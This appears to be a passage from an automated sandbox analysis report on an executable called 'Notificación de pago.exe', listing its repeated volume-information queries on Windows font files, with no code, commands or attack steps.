          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
